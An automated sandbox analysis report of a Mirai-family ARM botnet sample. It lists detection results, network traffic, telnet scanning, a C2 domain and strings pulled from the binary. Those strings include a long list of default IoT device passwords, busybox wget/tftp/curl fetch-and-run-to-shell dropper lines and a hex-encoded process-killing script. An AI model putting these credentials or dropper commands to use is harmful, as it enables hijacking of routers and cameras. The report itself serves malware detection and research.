Edit tour

Linux Analysis Report
la.bot.arm5.elf

Overview

General Information

Sample name:la.bot.arm5.elf
Analysis ID:1540926
MD5:0fb5d69f40f302dc85c2806f071322a2
SHA1:ba7cc85f29ac00c81bb656871e0f65b8b6f71f52
SHA256:6f77050cfd8693ab6a00d0af54aa2e15725068180818d8ab0fc946ae12009f89
Tags:elfuser-abuse_ch
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Connects to many ports of the same IP (likely port scanning)
Deletes system log files
Sample tries to access files in /etc/config/ (typical for OpenWRT routers)
Uses known network protocols on non-standard ports
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1540926
Start date and time:2024-10-24 10:16:31 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 48s
Hypervisor based Inspection enabled:false
Report type:light
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:la.bot.arm5.elf
Detection:MAL
Classification:mal72.troj.evad.linELF@0/0@3/0
  • Report size exceeded maximum capacity and may have missing network information.
  • TCP Packets have been reduced to 100
  • VT rate limit hit for: la.bot.arm5.elf
Command:/tmp/la.bot.arm5.elf
PID:5830
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
thIs wEek on xLaB lEarNs nOthinG xd
Standard Error:
  • system is lnxubuntu20
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: la.bot.arm5.elfAvira: detected
Source: la.bot.arm5.elfReversingLabs: Detection: 42%
Source: la.bot.arm5.elfString: ash|login|wget|curl|tftp|ntpdate
Source: la.bot.arm5.elfString: /proc//exe|ash|login|wget|curl|tftp|ntpdate/fd/dev/null|/dev/consolesocket|proc/usr/bin/usr/sbin/system/mnt/mtd/app/org/z/zbin/home/app/dvr/bin/duksan/userfs/mnt/app/usr/etc/dvr/main/usr/local/var/bin/tmp/sqfs/z/bin/dvr/mnt/mtd/zconf/gm/bin/home/process/var/challenge/usr/lib/lib/systemd//usr/lib/systemd/system/system/bin//mnt//home/helper/home/davinci/usr/libexec//sbin//bin//proc/net/tcp/proc/fd//proc/self/exe/. /proc//maps/lib//dev/watchdog/dev/misc/watchdogtelnetd|udhcpc|ntpclient|boa|httpd|mini_http|watchdog|pppdM
Source: la.bot.arm5.elfString: rootPon521Zte521root621vizxvoelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.admin7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_ja12345t0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantech1234dreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123telnetipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestftpusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8lJwpbo6tluafedvstarcam201520150602supporthikvisione8ehomeasbe8ehomee8telnetcisco/bin/busyboxenableshellshlinuxshellping ;sh/bin/busybox hostname FICORA/bin/busybox echo > .ri && sh .ri && cd .ntpfsh .ntpf/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrepwEek/var//var/run//var/tmp//dev//dev/shm//etc//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63\x2F\x2A\3B""\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A\x20\x20\x23\x20\x53\x6B\x69\x70\x20\x6E\x6F\x6E\x2D""\x6E\x75\x6D\x65\x72\x69\x63\x20\x64\x69\x72\x65\x63\x74\x6F\x72\x69\x65\x73\x0A\x20\x20\x69\x66\x20\x21\x20\x5B\x20\x22\x24\x70\x69\x64\x22\x20\x2D\x65""\x71\x20\x22\x24\x70\x69\x64\x22\x20\x5D\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x63\x6F\x6E\x74""\x69\x6E\x75\x65\x0A\x20\x20\x66\x69\x0A\x0A\x20\x20\x23\x20\x47\x65\x74\x20\x74\x68\x65\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x20\x6C\x69\x6E\x65\x20\x6F\x66""\x20\x74\x68\x65\x20\x70\x72\x6F\x63\x65\x73\x73\x0A\x20\x20\x63\x6D\x64\x6C\x69\x6E\x65\x3D\x24\x28\x74\x72\x20\x27\x5C\x30\x27\x20\x27\x20\x27\x20\x3C""\x20\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x63\x6D\x64\x6C\x69\x6E\x65\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x23""\x20\x43\x68\x65\x63\x6B\x20\x69\x66\x20\x74\x68\x65\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x20\x6C\x69\x6E\x65\x20\x63\x6F\x6E\x74\x61\x69\x6E\x73\x20\x22\x64""\x76\x72\x48\x65\x6C\x70\x65\x72\x22\x0A\x20\x20\x69\x66\x20\x65\x63\x68\x6F\x20\x22\x24\x63\x6D\x64\x6C\x69\x6E\x65\x22\x20\x7C\x20\x67\x72\x65\x70\x20\x2D""\x71\x20\x22\x64\x76\x72\x48\x65\x6C\x70\x65\x72\x22\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64""\x22\x0A\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4h

Networking

barindex
Source: global trafficTCP traffic: 103.253.147.242 ports 23789,3,4,6,7,9,49376
Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 53388
Source: global trafficTCP traffic: 192.168.2.15:34788 -> 103.253.147.242:49376
Source: /tmp/la.bot.arm5.elf (PID: 5830)Socket: 127.0.0.1:1234
Source: unknownTCP traffic detected without corresponding DNS query: 161.221.109.248
Source: unknownTCP traffic detected without corresponding DNS query: 102.174.1.97
Source: unknownTCP traffic detected without corresponding DNS query: 17.40.227.46
Source: unknownTCP traffic detected without corresponding DNS query: 172.147.90.98
Source: unknownTCP traffic detected without corresponding DNS query: 203.19.251.101
Source: unknownTCP traffic detected without corresponding DNS query: 59.113.224.95
Source: unknownTCP traffic detected without corresponding DNS query: 133.97.255.33
Source: unknownTCP traffic detected without corresponding DNS query: 161.49.228.103
Source: unknownTCP traffic detected without corresponding DNS query: 143.8.246.204
Source: unknownTCP traffic detected without corresponding DNS query: 115.105.149.3
Source: unknownTCP traffic detected without corresponding DNS query: 34.134.164.18
Source: unknownTCP traffic detected without corresponding DNS query: 166.86.202.125
Source: unknownTCP traffic detected without corresponding DNS query: 17.51.108.80
Source: unknownTCP traffic detected without corresponding DNS query: 154.252.184.121
Source: unknownTCP traffic detected without corresponding DNS query: 221.255.213.98
Source: unknownTCP traffic detected without corresponding DNS query: 13.231.190.190
Source: unknownTCP traffic detected without corresponding DNS query: 1.248.140.234
Source: unknownTCP traffic detected without corresponding DNS query: 148.39.113.132
Source: unknownTCP traffic detected without corresponding DNS query: 181.143.83.193
Source: unknownTCP traffic detected without corresponding DNS query: 6.22.211.33
Source: unknownTCP traffic detected without corresponding DNS query: 182.177.88.49
Source: unknownTCP traffic detected without corresponding DNS query: 53.109.96.158
Source: unknownTCP traffic detected without corresponding DNS query: 6.219.255.210
Source: unknownTCP traffic detected without corresponding DNS query: 220.75.36.1
Source: unknownTCP traffic detected without corresponding DNS query: 148.217.204.246
Source: unknownTCP traffic detected without corresponding DNS query: 138.63.35.123
Source: unknownTCP traffic detected without corresponding DNS query: 221.2.232.78
Source: unknownTCP traffic detected without corresponding DNS query: 134.88.197.137
Source: unknownTCP traffic detected without corresponding DNS query: 165.124.104.4
Source: unknownTCP traffic detected without corresponding DNS query: 100.180.228.110
Source: unknownTCP traffic detected without corresponding DNS query: 107.244.163.93
Source: unknownTCP traffic detected without corresponding DNS query: 134.103.223.211
Source: unknownTCP traffic detected without corresponding DNS query: 51.17.255.140
Source: unknownTCP traffic detected without corresponding DNS query: 156.177.125.63
Source: unknownTCP traffic detected without corresponding DNS query: 137.170.58.74
Source: unknownTCP traffic detected without corresponding DNS query: 179.63.223.66
Source: unknownTCP traffic detected without corresponding DNS query: 9.215.117.225
Source: unknownTCP traffic detected without corresponding DNS query: 133.40.145.47
Source: unknownTCP traffic detected without corresponding DNS query: 96.112.121.1
Source: unknownTCP traffic detected without corresponding DNS query: 120.24.79.240
Source: unknownTCP traffic detected without corresponding DNS query: 122.129.179.145
Source: unknownTCP traffic detected without corresponding DNS query: 166.42.119.130
Source: unknownTCP traffic detected without corresponding DNS query: 89.113.242.0
Source: unknownTCP traffic detected without corresponding DNS query: 157.157.93.100
Source: unknownTCP traffic detected without corresponding DNS query: 186.250.30.239
Source: unknownTCP traffic detected without corresponding DNS query: 191.109.43.179
Source: unknownTCP traffic detected without corresponding DNS query: 48.234.236.135
Source: unknownTCP traffic detected without corresponding DNS query: 114.69.254.172
Source: unknownTCP traffic detected without corresponding DNS query: 122.84.159.66
Source: unknownTCP traffic detected without corresponding DNS query: 212.120.234.149
Source: global trafficDNS traffic detected: DNS query: fortyfivehundred.dyn
Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
Source: la.bot.arm5.elfString found in binary or memory: http:///curl.sh
Source: la.bot.arm5.elfString found in binary or memory: http:///wget.sh
Source: Initial sampleString containing 'busybox' found: usage: busybox
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sampleString containing 'busybox' found: /bin/busybox
Source: Initial sampleString containing 'busybox' found: /bin/busybox hostname FICORA
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo >
Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://
Source: Initial sampleString containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g
Source: Initial sampleString containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget
Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrep
Source: Initial sampleString containing 'busybox' found: usage: busyboxincorrectinvalidbadwrongfaildeniederrorretryGET /dlr. HTTP/1.0
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne >> > upnp
Source: Initial sampleString containing 'busybox' found: rootPon521Zte521root621vizxvoelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.admin7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_ja12345t0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantech1234dreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123telnetipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestftpusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8lJwpbo6tluafedvstarcam201520150602supporthikvisione8ehomeasbe8ehomee8telnetcisco/bin/busyboxenableshellshlinuxshellping ;sh/bin/busybox hostname FICORA/bin/busybox echo > .ri && sh .ri && cd .ntpfsh .ntpf/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrepwEek/var//var/run//var
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal72.troj.evad.linELF@0/0@3/0

Data Obfuscation

barindex
Source: /tmp/la.bot.arm5.elf (PID: 5834)File: /etc/config
Source: /tmp/la.bot.arm5.elf (PID: 5834)Directory: /root/.cache
Source: /tmp/la.bot.arm5.elf (PID: 5834)Directory: /root/.ssh
Source: /tmp/la.bot.arm5.elf (PID: 5834)Directory: /root/.config
Source: /tmp/la.bot.arm5.elf (PID: 5834)Directory: /root/.local
Source: /tmp/la.bot.arm5.elf (PID: 5834)Directory: /tmp/.X11-unix
Source: /tmp/la.bot.arm5.elf (PID: 5834)Directory: /tmp/.Test-unix
Source: /tmp/la.bot.arm5.elf (PID: 5834)Directory: /tmp/.font-unix
Source: /tmp/la.bot.arm5.elf (PID: 5834)Directory: /tmp/.ICE-unix
Source: /tmp/la.bot.arm5.elf (PID: 5834)Directory: /tmp/.XIM-unix
Source: /tmp/la.bot.arm5.elf (PID: 5834)Directory: /etc/.java

Hooking and other Techniques for Hiding and Protection

barindex
Source: /tmp/la.bot.arm5.elf (PID: 5834)Log files deleted: /var/log/kern.logJump to behavior
Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 53388
Source: /tmp/la.bot.arm5.elf (PID: 5830)Queries kernel information via 'uname':
Source: la.bot.arm5.elf, 5830.1.0000557e5ac30000.0000557e5ad7e000.rw-.sdmpBinary or memory string: Z~U!/etc/qemu-binfmt/arm
Source: la.bot.arm5.elf, 5830.1.0000557e5ac30000.0000557e5ad7e000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
Source: la.bot.arm5.elf, 5830.1.00007ffd5d1c3000.00007ffd5d1e4000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
Source: la.bot.arm5.elf, 5830.1.00007ffd5d1c3000.00007ffd5d1e4000.rw-.sdmpBinary or memory string: +`tx86_64/usr/bin/qemu-arm/tmp/la.bot.arm5.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/la.bot.arm5.elf
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid AccountsWindows Management Instrumentation1
Scripting
Path Interception1
Hidden Files and Directories
OS Credential Dumping11
Security Software Discovery
Remote ServicesData from Local System11
Non-Standard Port
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Indicator Removal
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1540926 Sample: la.bot.arm5.elf Startdate: 24/10/2024 Architecture: LINUX Score: 72 19 160.66.45.19 WOODYNET-2US Italy 2->19 21 14.175.125.242 VNPT-AS-VNVNPTCorpVN Viet Nam 2->21 23 100 other IPs or domains 2->23 25 Antivirus / Scanner detection for submitted sample 2->25 27 Multi AV Scanner detection for submitted file 2->27 29 Connects to many ports of the same IP (likely port scanning) 2->29 31 Uses known network protocols on non-standard ports 2->31 8 la.bot.arm5.elf 2->8         started        signatures3 process4 process5 10 la.bot.arm5.elf 8->10         started        13 la.bot.arm5.elf 8->13         started        15 la.bot.arm5.elf 8->15         started        signatures6 33 Sample tries to access files in /etc/config/ (typical for OpenWRT routers) 10->33 35 Deletes system log files 10->35 17 la.bot.arm5.elf 13->17         started        process7
SourceDetectionScannerLabelLink
la.bot.arm5.elf42%ReversingLabsLinux.Backdoor.Mirai
la.bot.arm5.elf100%AviraLINUX/GM.Mirai.LV
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
daisy.ubuntu.com
162.213.35.25
truefalse
    unknown
    fortyfivehundred.dyn
    156.244.19.135
    truefalse
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http:///wget.shla.bot.arm5.elffalse
        unknown
        http:///curl.shla.bot.arm5.elffalse
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          209.116.197.21
          unknownUnited States
          10355DSCGAUSfalse
          123.209.118.19
          unknownAustralia
          1221ASN-TELSTRATelstraCorporationLtdAUfalse
          204.126.155.32
          unknownUnited States
          5078ONENET-AS-1USfalse
          79.175.192.232
          unknownPoland
          44061SMSNETPLfalse
          1.70.225.119
          unknownChina
          4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
          111.74.133.111
          unknownChina
          4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
          43.5.218.112
          unknownJapan4249LILLY-ASUSfalse
          173.123.87.171
          unknownUnited States
          10507SPCSUSfalse
          153.46.227.93
          unknownUnited States
          2116ASN-CATCHCOMNOfalse
          154.146.137.84
          unknownMorocco
          6713IAM-ASMAfalse
          202.106.69.251
          unknownChina
          4808CHINA169-BJChinaUnicomBeijingProvinceNetworkCNfalse
          50.164.205.15
          unknownUnited States
          7922COMCAST-7922USfalse
          135.173.127.133
          unknownUnited States
          14962NCR-252USfalse
          64.119.106.50
          unknownCanada
          812ROGERS-COMMUNICATIONSCAfalse
          212.255.253.167
          unknownGermany
          12312ECOTELDEfalse
          54.250.110.40
          unknownUnited States
          16509AMAZON-02USfalse
          143.185.53.168
          unknownUnited States
          13127VERSATELASfortheTrans-EuropeanTele2IPTransportbackbofalse
          212.107.56.246
          unknownEstonia
          1257TELE2EUfalse
          142.37.69.3
          unknownCanada
          3633PROVINCE-OF-BRITISH-COLUMBIACAfalse
          114.152.95.128
          unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
          37.114.139.112
          unknownAzerbaijan
          44725AZQTEL-ASAZfalse
          168.20.201.133
          unknownUnited States
          3479PEACHNET-AS1USfalse
          145.68.2.73
          unknownNetherlands
          1103SURFNET-NLSURFnetTheNetherlandsNLfalse
          77.240.163.105
          unknownRussian Federation
          44206SIBSET-KRS-ASRUfalse
          124.64.44.125
          unknownChina
          4808CHINA169-BJChinaUnicomBeijingProvinceNetworkCNfalse
          133.203.112.29
          unknownJapan2518BIGLOBEBIGLOBEIncJPfalse
          152.133.24.226
          unknownUnited States
          29992VA-TMP-COREUSfalse
          94.172.250.169
          unknownNetherlands
          6830LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHoldingfalse
          32.222.207.166
          unknownUnited States
          46690SNET-FCCUSfalse
          222.39.101.206
          unknownChina
          9394CTTNETChinaTieTongTelecommunicationsCorporationCNfalse
          14.175.125.242
          unknownViet Nam
          45899VNPT-AS-VNVNPTCorpVNfalse
          102.56.250.17
          unknownEgypt
          36992ETISALAT-MISREGfalse
          176.29.207.73
          unknownJordan
          20773GODADDYDEfalse
          208.121.115.85
          unknownUnited States
          39961CCSFUSfalse
          158.10.74.219
          unknownUnited States
          5180DNIC-ASBLK-05120-05376USfalse
          23.109.101.107
          unknownNetherlands
          7979SERVERS-COMUSfalse
          34.199.38.66
          unknownUnited States
          14618AMAZON-AESUSfalse
          49.80.4.254
          unknownChina
          4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
          161.125.123.199
          unknownUnited States
          786JANETJiscServicesLimitedGBfalse
          56.252.243.47
          unknownUnited States
          2686ATGS-MMD-ASUSfalse
          153.37.53.61
          unknownChina
          4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
          138.85.137.89
          unknownUnited States
          8147ASERICYUSfalse
          19.82.246.221
          unknownUnited States
          3MIT-GATEWAYSUSfalse
          184.12.235.13
          unknownUnited States
          7011FRONTIER-AND-CITIZENSUSfalse
          9.49.234.27
          unknownUnited States
          3356LEVEL3USfalse
          21.50.188.117
          unknownUnited States
          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
          32.190.98.136
          unknownUnited States
          20057ATT-MOBILITY-LLC-AS20057USfalse
          18.239.74.176
          unknownUnited States
          16509AMAZON-02USfalse
          191.62.134.32
          unknownBrazil
          22085ClaroSABRfalse
          95.39.158.2
          unknownSpain
          6739ONO-ASCableuropa-ONOESfalse
          35.234.225.58
          unknownUnited States
          15169GOOGLEUSfalse
          170.51.125.109
          unknownArgentina
          11664TechtelLMDSComunicacionesInteractivasSAARfalse
          17.248.243.139
          unknownUnited States
          714APPLE-ENGINEERINGUSfalse
          45.200.109.36
          unknownSeychelles
          328608Africa-on-Cloud-ASZAfalse
          14.78.249.24
          unknownKorea Republic of
          4766KIXS-AS-KRKoreaTelecomKRfalse
          171.69.26.0
          unknownUnited States
          109CISCOSYSTEMSUSfalse
          89.113.242.0
          unknownRussian Federation
          8402CORBINA-ASOJSCVimpelcomRUfalse
          51.50.201.34
          unknownUnited States
          2686ATGS-MMD-ASUSfalse
          41.248.147.134
          unknownMorocco
          36903MT-MPLSMAfalse
          215.190.164.100
          unknownUnited States
          721DNIC-ASBLK-00721-00726USfalse
          82.10.79.183
          unknownUnited Kingdom
          5089NTLGBfalse
          8.212.245.35
          unknownSingapore
          45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
          80.133.28.51
          unknownGermany
          3320DTAGInternetserviceprovideroperationsDEfalse
          68.59.120.66
          unknownUnited States
          7922COMCAST-7922USfalse
          46.142.124.94
          unknownGermany
          8881VERSATELDEfalse
          194.155.96.97
          unknownUnited Kingdom
          5503RMIFLGBfalse
          164.203.33.228
          unknownUnited States
          3303SWISSCOMSwisscomSwitzerlandLtdCHfalse
          65.214.49.114
          unknownUnited States
          11486COLO-PREM-VZBUSfalse
          4.134.154.187
          unknownUnited States
          3356LEVEL3USfalse
          9.243.33.56
          unknownUnited States
          3356LEVEL3USfalse
          25.233.253.64
          unknownUnited Kingdom
          7922COMCAST-7922USfalse
          179.196.96.240
          unknownBrazil
          7738TelemarNorteLesteSABRfalse
          88.112.19.163
          unknownFinland
          719ELISA-ASHelsinkiFinlandEUfalse
          70.98.5.155
          unknownUnited States
          7385ALLSTREAMUSfalse
          42.27.208.11
          unknownKorea Republic of
          9644SKTELECOM-NET-ASSKTelecomKRfalse
          129.241.47.86
          unknownNorway
          224UNINETTUNINETTTheNorwegianUniversityResearchNetworkfalse
          48.155.73.55
          unknownUnited States
          2686ATGS-MMD-ASUSfalse
          54.222.36.1
          unknownChina
          55960BJ-GUANGHUAN-APBeijingGuanghuanXinwangDigitalCNfalse
          64.217.178.27
          unknownUnited States
          7018ATT-INTERNET4USfalse
          148.39.53.225
          unknownUnited States
          6400CompaniaDominicanadeTelefonosSADOfalse
          98.60.100.127
          unknownUnited States
          7922COMCAST-7922USfalse
          63.15.31.13
          unknownUnited States
          701UUNETUSfalse
          75.26.249.11
          unknownUnited States
          7018ATT-INTERNET4USfalse
          174.2.153.30
          unknownCanada
          6327SHAWCAfalse
          16.91.204.224
          unknownUnited States
          unknownunknownfalse
          40.177.38.122
          unknownUnited States
          4249LILLY-ASUSfalse
          73.12.6.155
          unknownUnited States
          7922COMCAST-7922USfalse
          216.90.231.13
          unknownUnited States
          3561CENTURYLINK-LEGACY-SAVVISUSfalse
          193.138.244.152
          unknownUkraine
          200337CS-INTEGRAUAfalse
          175.185.27.17
          unknownChina
          4538ERX-CERNET-BKBChinaEducationandResearchNetworkCenterfalse
          160.66.45.19
          unknownItaly
          715WOODYNET-2USfalse
          193.69.238.194
          unknownNorway
          2116ASN-CATCHCOMNOfalse
          193.230.181.27
          unknownRomania
          6663TTI-NETROfalse
          49.210.105.19
          unknownChina
          7497CSTNET-AS-APComputerNetworkInformationCenterCNfalse
          153.39.201.176
          unknownUnited States
          3371MCI-ASNUSfalse
          191.52.117.143
          unknownBrazil
          28193UNIVERSIDADEESTADUALDELONDRINABRfalse
          105.149.197.68
          unknownMorocco
          6713IAM-ASMAfalse
          36.236.211.71
          unknownTaiwan; Republic of China (ROC)
          3462HINETDataCommunicationBusinessGroupTWfalse
          129.54.65.173
          unknownUnited States
          385AFCONC-BLOCK1-ASUSfalse
          70.178.77.0
          unknownUnited States
          22773ASN-CXA-ALL-CCI-22773-RDCUSfalse
          No context
          No context
          No context
          No context
          No context
          No created / dropped files found
          File type:ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
          Entropy (8bit):6.057756621522498
          TrID:
          • ELF Executable and Linkable format (generic) (4004/1) 100.00%
          File name:la.bot.arm5.elf
          File size:71'988 bytes
          MD5:0fb5d69f40f302dc85c2806f071322a2
          SHA1:ba7cc85f29ac00c81bb656871e0f65b8b6f71f52
          SHA256:6f77050cfd8693ab6a00d0af54aa2e15725068180818d8ab0fc946ae12009f89
          SHA512:66cd320b38030796b89d326d981d5266f3c6728427516412aae396e8e7a3cf743ad35b3385f966de3c423901f1f89a96fd8c3bba44380084efb71c1b69ce5f6a
          SSDEEP:1536:5Qup0wPcPswerobvjb9KU+WQ8V1Q3Cvq1ey4nzsT:iuGZPsKnb9KxWQU1uCvekn
          TLSH:6B63F785B992DA5BC6D816BBFA0F82CD372663D8E3DE3213CD14BF51378696B091B041
          File Content Preview:.ELF...a..........(.........4...........4. ...(.....................|...|................................E..........Q.td..................................-...L."...9=..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

          ELF header

          Class:ELF32
          Data:2's complement, little endian
          Version:1 (current)
          Machine:ARM
          Version Number:0x1
          Type:EXEC (Executable file)
          OS/ABI:ARM - ABI
          ABI Version:0
          Entry Point Address:0x8190
          Flags:0x2
          ELF Header Size:52
          Program Header Offset:52
          Program Header Size:32
          Number of Program Headers:3
          Section Header Offset:71588
          Section Header Size:40
          Number of Section Headers:10
          Header String Table Index:9
          NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
          NULL0x00x00x00x00x0000
          .initPROGBITS0x80940x940x180x00x6AX004
          .textPROGBITS0x80b00xb00xf51c0x00x6AX0016
          .finiPROGBITS0x175cc0xf5cc0x140x00x6AX004
          .rodataPROGBITS0x175e00xf5e00x1e9c0x00x2A004
          .ctorsPROGBITS0x214800x114800x80x00x3WA004
          .dtorsPROGBITS0x214880x114880x80x00x3WA004
          .dataPROGBITS0x214940x114940x2d00x00x3WA004
          .bssNOBITS0x217640x117640x42a40x00x3WA004
          .shstrtabSTRTAB0x00x117640x3e0x00x0001
          TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
          LOAD0x00x80000x80000x1147c0x1147c6.07730x5R E0x8000.init .text .fini .rodata
          LOAD0x114800x214800x214800x2e40x45883.74840x6RW 0x8000.ctors .dtors .data .bss
          GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
          TimestampSource PortDest PortSource IPDest IP
          Oct 24, 2024 10:17:53.722479105 CEST3827823192.168.2.15161.221.109.248
          Oct 24, 2024 10:17:53.729948997 CEST3803823192.168.2.15102.174.1.97
          Oct 24, 2024 10:17:53.750592947 CEST4142423192.168.2.1517.40.227.46
          Oct 24, 2024 10:17:53.756700993 CEST4674023192.168.2.15172.147.90.98
          Oct 24, 2024 10:17:53.764221907 CEST3358223192.168.2.15203.19.251.101
          Oct 24, 2024 10:17:53.770673037 CEST4408023192.168.2.1559.113.224.95
          Oct 24, 2024 10:17:53.778407097 CEST5012023192.168.2.15133.97.255.33
          Oct 24, 2024 10:17:53.792721987 CEST4477023192.168.2.15161.49.228.103
          Oct 24, 2024 10:17:53.798579931 CEST4196223192.168.2.15143.8.246.204
          Oct 24, 2024 10:17:53.803905010 CEST5007023192.168.2.15115.105.149.3
          Oct 24, 2024 10:17:53.808345079 CEST4532423192.168.2.1534.134.164.18
          Oct 24, 2024 10:17:53.812736034 CEST4224623192.168.2.1576.104.10.48
          Oct 24, 2024 10:17:53.816382885 CEST4572623192.168.2.15166.86.202.125
          Oct 24, 2024 10:17:53.820220947 CEST3984623192.168.2.1517.51.108.80
          Oct 24, 2024 10:17:53.824212074 CEST3543423192.168.2.15154.252.184.121
